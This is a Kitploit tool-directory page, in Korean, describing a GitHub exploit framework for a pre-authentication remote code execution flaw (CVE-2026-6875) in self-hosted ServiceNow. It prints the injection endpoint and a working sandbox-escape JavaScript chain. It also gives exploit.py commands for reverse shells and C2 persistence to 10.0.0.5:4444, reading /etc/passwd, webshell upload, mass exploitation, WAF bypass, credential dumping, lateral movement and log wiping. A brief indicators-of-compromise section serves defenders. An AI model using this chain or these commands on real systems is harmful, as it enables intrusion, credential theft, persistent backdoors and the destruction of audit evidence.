Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-6875-PoC-Exploit — CVE-2026-6875 ServiceNow 사전 인증 RCE 프레임워크 🔥 JS 인젝션 → 샌드박스 탈출 → RCE → 루트. 기능: --detect, --exec, 역방향/대화형 셸, 배치 스레딩, WAF 우회, 지속성, 측면 이동, 자격 증명 덤프, 파일리스 실행, 추적 정리. 🛡️ CVSS 9.5 적극적으로 악용됨. 승인 및 법적 사용 전용. 법을 준수하세요. 🔒 | Kitploit
도구/GitHubGitHub/tc4dy/cve-2026-6875-poc-exploit
Privilege EscalationVulnerability ScannersPersistence MechanismsExploitationLateral MovementWeb Application ExploitationPost-ExploitationWAF BypassPenetration Testing

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Remote Access Tool
GitHubtc4dy/cve-2026-6875-poc-exploit

CVE-2026-6875-PoC-Exploit

CVE-2026-6875 ServiceNow 사전 인증 RCE 프레임워크 🔥 JS 인젝션 → 샌드박스 탈출 → RCE → 루트. 기능: --detect, --exec, 역방향/대화형 셸, 배치 스레딩, WAF 우회, 지속성, 측면 이동, 자격 증명 덤프, 파일리스 실행, 추적 정리. 🛡️ CVSS 9.5 적극적으로 악용됨. 승인 및 법적 사용 전용. 법을 준수하세요. 🔒

저장소 보기
391개월 전아직 검토되지 않음

CVE-2026-6875

CVE-2026-6875 - ServiceNow 사전 인증 RCE 익스플로잇 프레임워크 및 PoC 확인기 🔥

CVE-2026-6875 CVSS 9.5 CISA KEV Python 3.6+

Pre-Auth RCE Sandbox Escape Privesc Windows Ready

ServiceNow AI Platform — JavaScript 인젝션 → 샌드박스 탈출 → RCE → Root 권한 상승

익스플로잇 프레임워크 및 안전 확인기
인가된 보안 테스트 전용입니다.


⚖️ 법적 고지 및 책임 있는 사용

이 도구는 교육 및 인가된 침투 테스트 목적으로만 제공됩니다.

저자와 기여자는 이 소프트웨어의 오용이나 손해에 대해 책임을 지지 않습니다. 사용자는 테스트 대상 소유자의 명시적 서면 허가를 받았는지 전적으로 확인해야 합니다. 무단 액세스는 컴퓨터 사기 및 남용법(CFAA) 및 전 세계 유사 법률에 따라 불법입니다.

이 소프트웨어를 사용함으로써 다음에 동의하는 것으로 간주됩니다:

  • 귀하가 소유하거나 테스트 권한을 명시적으로 부여받은 시스템에서만 사용합니다.
  • 모든 해당 지역, 주, 연방 법률을 준수합니다.
  • 악의적, 파괴적 또는 불법 활동에 사용하지 않습니다.

⚠️ 경고: 이 취약점은 현재 실제 환경에서 적극적으로 악용되고 있습니다. 무단 사용은 심각한 법적 결과를 초래할 수 있습니다.


🔥 취약점 개요

CVE-2026-6875는 ServiceNow AI Platform(이전 Now Platform)의 중요한 인증되지 않은 원격 코드 실행(RCE) 취약점입니다. 공격자는 스크립트 샌드박스를 우회하고 ServiceNow 애플리케이션의 권한으로 임의의 시스템 명령을 실행할 수 있습니다.

작동 방식:

  1. JavaScript 인젝션: assessment_thanks.do 엔드포인트는 sysparm_assessable_type 매개변수를 허용합니다. 값 앞에 javascript:를 붙여 공격자는 임의의 JavaScript 코드를 주입합니다.

  2. 샌드박스 탈출: 정교한 샌드박스 탈출 가젯(DiscoveryFunctions.getCacheObjectForTable, AbstractAjaxProcessor, Class.create 체이닝)이 JavaScript 샌드박스 제한을 해제합니다.

  3. 원격 코드 실행: 주입된 Java 코드(java.lang.Runtime.exec() 경유)가 ServiceNow 애플리케이션 권한으로 실행되어 시스템 전체를 장악할 수 있습니다.

  4. 권한 상승: 사후 악용 모듈은 sudo 오설정, SUID 바이너리, 쓰기 가능한 크론 작업 또는 커널 익스플로잇을 통해 root로 권한을 상승시키려 시도합니다.

주요 사실:


🛠️ 익스플로잇 프레임워크 (exploit.py)

완전 무장 익스플로잇은 JavaScript 인젝션과 샌드박스 탈출을 연결하여 원격 코드 실행을 달성하며, 지속성, 측면 이동, 자격 증명 덤프를 위한 고급 사후 악용 모듈을 포함합니다.

✨ 기능

대화형 셸 명령어


🕵️ 안전 확인기 (verifier.py)

안전 확인기는 유해한 페이로드를 실행하거나 시스템 변경을 가하지 않고 비침습적 취약점 탐지를 수행합니다.

✨ 기능


📦 설치 및 요구 사항

사전 요구 사항

  • Python 3.6+
  • pip (requests 라이브러리용)

종속성 설치

root@kitploit:~
pip install requests urllib3

[!NOTE] exploit.py는 핵심 기능에 표준 라이브러리만 사용합니다. requests는 --detect 기능, --webhook 알림 및 안전 확인기에서만 필요합니다.


🚀 사용 예제

[1] 안전 확인기 (verifier.py)

root@kitploit:~
# 단일 대상 확인
python verifier.py -u 192.168.1.100

# 사용자 정의 포트 및 경로
python verifier.py -u 10.0.0.5 -p 8443 --path /snow

# 파일에서 대량 스캔
python verifier.py -l targets.txt -o results.json

# 조용한 모드 (취약한 대상만 출력)
python verifier.py -u 192.168.1.100 -q

# 느린 대상에 대한 타임아웃 증가
python verifier.py -u servicenow.example.com --timeout 60

# 사용자 정의 User-Agent
python verifier.py -u 192.168.1.100 --user-agent "MyScanner/1.0"

[2] 익스플로잇 프레임워크 (exploit.py)

root@kitploit:~
# 대상에서 대화형 셸 실행
python exploit.py -u 192.168.1.100

# 단일 명령 실행
python exploit.py -u 192.168.1.100 --exec "id && whoami"

# 파일 읽기
python exploit.py -u 192.168.1.100 --read-file /etc/passwd

# 악용 전 탐지 활성화
python exploit.py -u 192.168.1.100 --detect

# root 권한 상승 시도
python exploit.py -u 192.168.1.100 --privesc

# 웹셸 업로드
python exploit.py -u 192.168.1.100 --upload shell.jsp

# C2로 지속성 설치
python exploit.py -u 192.168.1.100 --persistence --c2-host 10.0.0.5 --c2-port 4444

# 악용 후 추적 제거
python exploit.py -u 192.168.1.100 --clean

# 파일리스(메모리) 페이로드 사용
python exploit.py -u 192.168.1.100 --fileless --c2-host 10.0.0.5 --c2-port 4444

# 파일에서 대량 악용 (50개 스레드)
python exploit.py -l targets.txt -m 50 --exec "uname -a"

# 사용자 정의 콜백 서버 포트
python exploit.py -u 192.168.1.100 --callback-port 9090

# WAF 우회 기술 활성화
python exploit.py -u 192.168.1.100 --waf-bypass

# 웹훅으로 알림 전송
python exploit.py -u 192.168.1.100 --webhook https://myhook.com/snow

# 파이프 모드 (stdin에서 명령 읽기)
echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100

# 사용자 정의 포트 및 경로
python exploit.py -u 10.0.0.5 -p 8443 --path /snow

# TLS 검증 비활성화 (자체 서명 인증서용)
python exploit.py -u 192.168.1.100 --insecure-tls

# 사용자 정의 타임아웃 및 재시도
python exploit.py -u 192.168.1.100 -t 60 -r 5 -d 2.0

🎯 영향받는 버전

⚠️ 중요: ServiceNow Cloud 인스턴스는 자동으로 패치됩니다. 이 취약점은 주로 자체 호스팅 배포에 영향을 미칩니다.


🧠 기술 심층 분석

1. JavaScript 인젝션 (CVE-2026-6875)

취약점은 sysparm_assessable_type 매개변수를 허용하는 assessment_thanks.do 엔드포인트에 있습니다. javascript:로 시작하는 값을 제공하면 플랫폼이 시스템 컨텍스트 내에서 후속 JavaScript를 평가합니다.

취약한 엔드포인트:

POST /assessment_thanks.do sysparm_assessable_type=javascript:gs.print('test')

2. 샌드박스 탈출 가젯

주입된 코드는 처음에 샌드박스 내로 제한됩니다. 그러나 다음 체인을 악용하여:

root@kitploit:~
javascript:
var s="<payload>";
DiscoveryFunctions.getCacheObjectForTable=Object;
var a={};a.get=Object;
var b=new AbstractAjaxProcessor();
b.initialize=DiscoveryFunctions.getFirstValueFromTable(
  a,"",DiscoveryFunctions.getFirstValueFromTable(
    a,"",DiscoveryFunctions.getFirstValueFromTable(
      a,"",global,"WorkflowIconsSCR",""),"prototype",""),"initialize","");
b.a=Class.create();b.a(s);

샌드박스가 우회되어 java.lang.Runtime과 같은 Java 클래스에 완전히 접근할 수 있습니다.

3. 사후 악용 모듈

자격 증명 덤프

비밀번호, API 키, 비밀을 위해 .properties, .xml, .conf 파일 검색:

  • /opt/ServiceNow/conf/*.xml
  • /var/log/ServiceNow/*.log
  • /etc/passwd, /etc/shadow

지속성

백도어 설치:

  • Linux: Cron 작업 (*/5 * * * *), systemd 서비스, SSH 키
  • Windows: 예약 작업 (schtasks), 레지스트리 실행 키

측면 이동

로컬 서브넷에서 다른 ServiceNow 인스턴스 또는 SSH 호스트를 스캔하고, 발견된 자격 증명을 재사용합니다.

파일리스 실행

즉석에서 Java 클래스를 컴파일하고 ClassLoader를 통해 로드하여 메모리에서 실행합니다 (디스크 쓰기 없음).

WAF 우회 기술

  1. 이중 URL 인코딩
  2. JavaScript 주석 ({/*comment*/})
  3. 유니코드 이스케이프 (\u0077 for w)
  4. 공백 삽입
  5. 키워드 분할 (ne\u0077 for new)
  6. 무작위 기술 선택

🔍 침해 지표 (IoCs)

로그 분석

ServiceNow 로그에서 다음을 검색하세요:

  • extraweb_access.log – sysparm_assessable_type에 다음이 포함된 /assessment_thanks.do 요청:
    • javascript:
    • Base64 인코딩 문자열
    • DiscoveryFunctions.getCacheObjectForTable
    • AbstractAjaxProcessor

파일 시스템

  • /var/tmp/의 예상치 못한 파일 (예: shell.jsp, .sh 스크립트)
  • 수정된 /etc/passwd, /etc/shadow 또는 ~/.ssh/authorized_keys
  • 새 크론 작업 (crontab -l)
  • 새 systemd 서비스 (/etc/systemd/system/)

프로세스

  • 의심스러운 프로세스 (/bin/bash -i, nc, curl, wget, python -c)
  • 외부 IP로의 예상치 못한 네트워크 연결

네트워크

  • ServiceNow 서버에서 승인되지 않은 IP로의 외부 연결
  • 비정상 포트의 리버스 셸 연결

📚 참고 자료

  • NVD - CVE-2026-6875
  • ServiceNow 보안 권고 (KB3137947)
  • CISA KEV 카탈로그
  • Searchlight Cyber – 기술 문서
  • The Hacker News – ServiceNow 제로데이 악용

🔗 기타 익스플로잇

[+] CVE-2026-15409/15410 - SonicWall SMA1000 다중 익스플로잇 프레임워크
https://github.com/tc4dy/CVE-2026-15409-15410-Framework

[+] CVE-2026-41091 - SolarFlare (RedSun) Microsoft Defender LPE
https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit

[+] CVE-2026-57821 - Apache Fineract SQL 인젝션 툴킷
https://github.com/tc4dy/CVE-2026-57821-PoC-Exploit

[+] CVE-2026-41940 - cPanel/WHM 인증 우회
https://github.com/tc4dy/CVE-2026-41940-PoC-Exploit

도구 다운로드
속성값
📅 발견일2026년 4월 1일 (Searchlight Cyber)
⚠️ CVSS 점수9.5 (CRITICAL)
📋 CISA KEV2026년 7월 13일 추가됨
🎯 영향받는 제품자체 호스팅 ServiceNow AI Platform
🔄 수정된 버전Brazil EA/GA, Australia Patch 2, Zurich Patch 7b/9, Yokohama Patch 12 Hot Fix 1b/13
🔓 인증 필요 여부필요하지 않음 (사전 인증)
🌍 실제 악용실제 환경에서 확인됨 (2026년 7월)
기능설명
🚀 JavaScript 인젝션sysparm_assessable_type 매개변수를 통해 페이로드 주입
💻 샌드박스 탈출ServiceNow 스크립트 샌드박스를 우회하여 임의 Java 코드 실행
🔐 대화형 셸여러 명령을 지원하는 라이브 셸 생성
👑 Root 권한 상승sudo 오설정, SUID 바이너리, 크론 작업 확인
📁 파일 작업웹셸 업로드, base64 인코딩을 통한 파일 읽기/다운로드
🌐 일괄 스캔스레딩을 사용한 여러 대상 대량 익스플로잇 (-l 플래그)
🎯 안전 탐지비침습적 취약점 확인을 위한 선택적 --detect 플래그
⚙️ WAF 우회WAF/IDS 우회 내장 기술 (6가지 기법)
🧩 지속성크론/systemd/schtasks 백도어 설치
🔍 측면 이동로컬 네트워크 내 다른 취약한 호스트 스캔 및 SSH/SSRF 전파 시도
🧹 추적 제거로그, bash 기록, 감사 추적 삭제
💾 파일리스 실행Java ClassLoader를 사용하여 디스크에 쓰지 않고 메모리 내 페이로드 실행
🔌 콜백 서버명령 출력 수신을 위한 내장 HTTP 서버 (선택 사항)
📢 웹훅 알림사용자 정의 URL로 결과 전송 (Slack, Discord 등)
🪟 크로스 플랫폼Linux 및 Windows 대상 지원 (cmd.exe / PowerShell)
🔒 스레드 안전동시 작업을 위한 잠금 메커니즘 사용
📊 버전 탐지ServiceNow 버전 탐지 (Zurich/Brazil/Australia/Yokohama)
명령어설명
exec <cmd>시스템 명령 실행
upload <local> [remote]대상에 웹셸 업로드
download <remote>파일 내용 다운로드 및 표시
privesc권한 상승 시도
reverse <host> <port>리버스 셸 전송
dumpcredServiceNow 설정에서 자격 증명 덤프
persist <host> <port>지속성 설치 (cron/systemd/schtasks)
lateral측면 이동 시도
clean추적 제거 (로그, 기록)
memory <host> <port>파일리스 Java 페이로드 실행
exit대화형 셸 종료
기능설명
🔍 ServiceNow 탐지여러 엔드포인트를 통해 ServiceNow 인스턴스 식별
📊 버전 탐지특정 ServiceNow 릴리스 및 패치 수준 탐지
🧪 JavaScript 인젝션 테스트안전한 gs.print() 페이로드를 사용한 인젝션 취약점 테스트
🔒 샌드박스 탈출 테스트파괴적 명령 없이 샌드박스 탈출 확인
📈 신뢰도 점수증거에 기반한 신뢰도 백분율 제공 (85–95%)
📋 JSON 출력보고용 JSON 형식으로 결과 내보내기
🔄 대량 스캔스레딩 지원으로 여러 대상 스캔
🎯 비침습적시스템 정보를 위해 양성 uname -a만 실행
ServiceNow 릴리스취약한 버전수정된 버전
BrazilEA, GA패치됨 (GA 이후)
AustraliaPatch 2 이전Patch 2+
ZurichPatch 7b, Patch 9 이전Patch 7b, Patch 9+
YokohamaPatch 12 Hot Fix 1b 이전Patch 12 Hot Fix 1b, Patch 13
기타 릴리스알 수 없음공식 권고 확인